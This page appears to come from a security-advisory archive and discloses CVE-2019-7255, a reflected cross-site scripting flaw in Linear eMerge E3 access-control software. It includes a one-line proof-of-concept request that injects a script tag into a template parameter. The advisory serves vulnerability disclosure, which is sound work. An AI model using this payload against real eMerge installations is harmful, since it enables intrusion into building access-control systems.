Linear eMerge E3 1.00-06 Cross Site Scripting

Linear eMerge E3 1.00-06 Cross Site Scripting: Posted Nov 12, 2019; Authored by LiquidWorm | Site applied-risk.com; Linear eMerge E3 versions 1.00-06 and below suffer from a reflective cross site scripting vulnerability.; tags | exploit, xss; advisories | CVE-2019-7255; SHA-256 | 231e07a81a92af56d190c9353cf3e9a3cc862dea393b99ef8e2a9600a031ff1f; Download | Favorite | View

Linear eMerge E3 1.00-06 Cross Site Scripting


Linear eMerge E3 Unauthenticated Reflected XSS
Affected version: <=1.00-06
CVE: CVE-2019-7255
Advisory: https://applied-risk.com/resources/ar-2019-005

Discovered by Gjoko 'LiquidWorm' Krstic

PoC:
GET /badging/badge_template_v0.php?layout=<script>confirm('XSS')</script> HTTP/1.1

Top Authors In Last 30 Days

Red Hat 240 files
Ubuntu 63 files
Debian 21 files
LiquidWorm 14 files
Apple 9 files
Gentoo 8 files
Alter Prime 3 files
EQSTLab 2 files
Yehia Elghaly 2 files
Pierre Kim 2 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,168)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,979)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,344)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (10,006)
UNIX (9,479)
UnixWare (188)
Windows (6,785)
Other

Linear eMerge E3 1.00-06 Cross Site Scripting

Linear eMerge E3 1.00-06 Cross Site Scripting

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Linear eMerge E3 1.00-06 Cross Site Scripting

Share This

Linear eMerge E3 1.00-06 Cross Site Scripting

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems